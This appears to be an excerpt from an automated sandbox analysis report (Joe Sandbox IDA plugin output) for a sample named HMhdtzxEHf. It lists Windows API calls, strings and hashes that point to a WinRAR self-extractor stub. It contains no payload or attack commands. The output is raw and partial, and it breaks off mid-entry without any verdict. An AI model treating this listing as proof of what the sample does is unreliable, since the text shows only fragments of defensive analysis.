                                                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                            • String ID: STATIC
                                                                                            • API String ID: 3820355801-1882779555
                                                                                            • Opcode ID: eb42068f0273b246d4f036030acdb72e141865b04a82e8c9e5932e2292782a2b
                                                                                            • Instruction ID: ea93e0e25ed177ac7db7af571afad5b78d345d645c677714e456304158fad8fc
                                                                                            • Opcode Fuzzy Hash: eb42068f0273b246d4f036030acdb72e141865b04a82e8c9e5932e2292782a2b
                                                                                            • Instruction Fuzzy Hash: DD11297B7453107BEA21EBB09D4AFAF767CAF94711F004512FA41A20A1DF64CF0646B5
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A59705
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A59711
                                                                                            • _free.LIBCMT ref: 00A5971C
                                                                                            • _free.LIBCMT ref: 00A59727
                                                                                            • _free.LIBCMT ref: 00A59732
                                                                                            • _free.LIBCMT ref: 00A5973D
                                                                                            • _free.LIBCMT ref: 00A59748
                                                                                            • _free.LIBCMT ref: 00A59753
                                                                                            • _free.LIBCMT ref: 00A5975E
                                                                                            • _free.LIBCMT ref: 00A5976C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 44b43e25231cbe3882d293f00b536e7775d9110452bc9ef6ef6c51ea2a5dd4cd
                                                                                            • Instruction ID: c5d9552824a1001cbd76625af26117b0c7b9725f00cf71b12cebdf61b86868bd
                                                                                            • Opcode Fuzzy Hash: 44b43e25231cbe3882d293f00b536e7775d9110452bc9ef6ef6c51ea2a5dd4cd
                                                                                            • Instruction Fuzzy Hash: 7B11A27611010DAFCB01EF94CA82CDD3BB5FF18351B5154A1FE089F262DE36EA589B84
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 322700389-393685449
                                                                                            • Opcode ID: acf91f123fd8aed87abd5d4de9de06b636a5949674e365da3c6d7d1f502ff8ca
                                                                                            • Instruction ID: 6cb8f6aea4e8dfe370035f0608e31eb8df846817e68ca1348312d347daeb0aef
                                                                                            • Opcode Fuzzy Hash: acf91f123fd8aed87abd5d4de9de06b636a5949674e365da3c6d7d1f502ff8ca
                                                                                            • Instruction Fuzzy Hash: AFB1A972800209EFCF29DFA4D981AAEBBB5FF55352F14455AEC016B202C731DA29CF91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A36FAA
                                                                                            • _wcslen.LIBCMT ref: 00A37013
                                                                                            • _wcslen.LIBCMT ref: 00A37084
                                                                                              • Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
                                                                                              • Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
                                                                                              • Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                            • API String ID: 3122303884-3508440684
                                                                                            • Opcode ID: 32dadf8b9f19019fc6bc1c5534398bff66dcb86924046b9ceb03eb7901e6cae5
                                                                                            • Instruction ID: 9f4e71aea956ed96c505ff063995b46e1b665888cb2d0f10455195b4badd54e2
                                                                                            • Opcode Fuzzy Hash: 32dadf8b9f19019fc6bc1c5534398bff66dcb86924046b9ceb03eb7901e6cae5
                                                                                            • Instruction Fuzzy Hash: 7A4118F2D08344BAEF30E7749E82FEEB7ACAF55340F004455FA45A7182D774AA888721
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4B610
                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A4B637
                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A4B650
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00A4B661
                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00A4B66A
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A4B67E
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A4B694
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                            • String ID: LICENSEDLG
                                                                                            • API String ID: 3214253823-2177901306
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,5D2DC526,00000001,00000000,00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FD99
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE14
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00A4FE1F
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE48
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE52
                                                                                            • GetLastError.KERNEL32(80070057,5D2DC526,00000001,00000000,00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE57
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE6A
                                                                                            • GetLastError.KERNEL32(00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE80
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE93
                                                                                            Similarity
                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 1353541977-0
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                            • API String ID: 3519838083-3505469590
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A39387
                                                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A393AA
                                                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00A393C9
                                                                                              • Part of subcall function 00A3C29A: _wcslen.LIBCMT ref: 00A3C2A2
                                                                                              • Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1
                                                                                            • _swprintf.LIBCMT ref: 00A39465
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00A394D4
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00A39514
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                            • String ID: rtmp%d
                                                                                            • API String ID: 3726343395-3303766350
                                                                                            APIs
                                                                                            • __aulldiv.LIBCMT ref: 00A4122E
                                                                                              • Part of subcall function 00A3B146: GetVersionExW.KERNEL32(?), ref: 00A3B16B
                                                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00A41251
                                                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00A41263
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A41274
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41284
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41294
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A412CF
                                                                                            • __aullrem.LIBCMT ref: 00A41379
                                                                                            Similarity
                                                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                            • String ID:
                                                                                            • API String ID: 1247370737-0
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A32536
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                            • API String ID: 3053425827-2277559157
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                                                            • API String ID: 176396367-3568243669
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A5FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00A5F6CF
                                                                                            • __fassign.LIBCMT ref: 00A5F74A
                                                                                            • __fassign.LIBCMT ref: 00A5F765
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A5F78B
                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,00A5FE02,00000000,?,?,?,?,?,?,?,?,?,00A5FE02,00000000), ref: 00A5F7AA
                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,00A5FE02,00000000,?,?,?,?,?,?,?,?,?,00A5FE02,00000000), ref: 00A5F7E3
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00A52937
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00A5293F
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00A529C8
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A529F3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00A52A48
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00A49EEE
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00A49F44
                                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00A49FDB
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00A49FE3
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00A49FF9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Window$Show$RectText
                                                                                            • String ID: RarHtmlClassName
                                                                                            • API String ID: 3937224194-1658105358
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                            • API String ID: 176396367-3743748572
                                                                                            APIs
                                                                                              • Part of subcall function 00A5C868: _free.LIBCMT ref: 00A5C891
                                                                                            • _free.LIBCMT ref: 00A5C8F2
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A5C8FD
                                                                                            • _free.LIBCMT ref: 00A5C908
                                                                                            • _free.LIBCMT ref: 00A5C95C
                                                                                            • _free.LIBCMT ref: 00A5C967
                                                                                            • _free.LIBCMT ref: 00A5C972
                                                                                            • _free.LIBCMT ref: 00A5C97D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A4E669,00A4E5CC,00A4E86D), ref: 00A4E605
                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A4E61B
                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A4E630
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                            • API String ID: 667068680-1718035505
                                                                                            APIs
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A414C2
                                                                                              • Part of subcall function 00A3B146: GetVersionExW.KERNEL32(?), ref: 00A3B16B
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A414E6
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A41500
                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A41513
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41523
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41533
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2092733347-0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00A52AF1,00A502FC,00A4FA34), ref: 00A52B08
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A52B16
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A52B2F
                                                                                            • SetLastError.KERNEL32(00000000,00A52AF1,00A502FC,00A4FA34), ref: 00A52B81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00A71030,00A54674,00A71030,?,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A597E9
                                                                                            • _free.LIBCMT ref: 00A5981C
                                                                                            • _free.LIBCMT ref: 00A59844
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A59851
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A5985D
                                                                                            • _abort.LIBCMT ref: 00A59863
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A4DC47
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4DC61
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4DC72
                                                                                            • TranslateMessage.USER32(?), ref: 00A4DC7C
                                                                                            • DispatchMessageW.USER32(?), ref: 00A4DC86
                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A4DC91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 2148572870-0
                                                                                            APIs
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                              • Part of subcall function 00A3B92D: _wcsrchr.LIBVCRUNTIME ref: 00A3B944
                                                                                            • _wcslen.LIBCMT ref: 00A3C197
                                                                                            • _wcslen.LIBCMT ref: 00A3C1DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$_wcsrchr
                                                                                            • String ID: .exe$.rar$.sfx
                                                                                            • API String ID: 3513545583-31770016
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00A4CE9D
                                                                                              • Part of subcall function 00A3B690: _wcslen.LIBCMT ref: 00A3B696
                                                                                            • _swprintf.LIBCMT ref: 00A4CED1
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • SetDlgItemTextW.USER32(?,00000066,00A7946A), ref: 00A4CEF1
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4CFFE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                            • String ID: %s%s%u
                                                                                            • API String ID: 110358324-1360425832
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00A3A275,?,?,00000800,?,00A3A23A,?,00A3755C), ref: 00A3BBC5
                                                                                            • _wcslen.LIBCMT ref: 00A3BC3B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$CurrentDirectory
                                                                                            • String ID: UNC$\\?\
                                                                                            • API String ID: 3341907918-253988292
                                                                                            APIs
                                                                                            • LoadBitmapW.USER32(00000065), ref: 00A4B6ED
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00A4B712
                                                                                            • DeleteObject.GDI32(00000000), ref: 00A4B744
                                                                                            • DeleteObject.GDI32(00000000), ref: 00A4B767
                                                                                              • Part of subcall function 00A4A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6D5
                                                                                              • Part of subcall function 00A4A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6EC
                                                                                              • Part of subcall function 00A4A6C2: LoadResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A703
                                                                                              • Part of subcall function 00A4A6C2: LockResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A712
                                                                                              • Part of subcall function 00A4A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A4B73D,00000066), ref: 00A4A72D
                                                                                              • Part of subcall function 00A4A6C2: GlobalLock.KERNEL32(00000000), ref: 00A4A73E
                                                                                              • Part of subcall function 00A4A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A4A762
                                                                                              • Part of subcall function 00A4A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A4A7A7
                                                                                              • Part of subcall function 00A4A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00A4A7C6
                                                                                              • Part of subcall function 00A4A6C2: GlobalFree.KERNEL32(00000000), ref: 00A4A7CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                            • String ID: ]
                                                                                            • API String ID: 1797374341-3352871620
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4D64B
                                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A4D661
                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A4D675
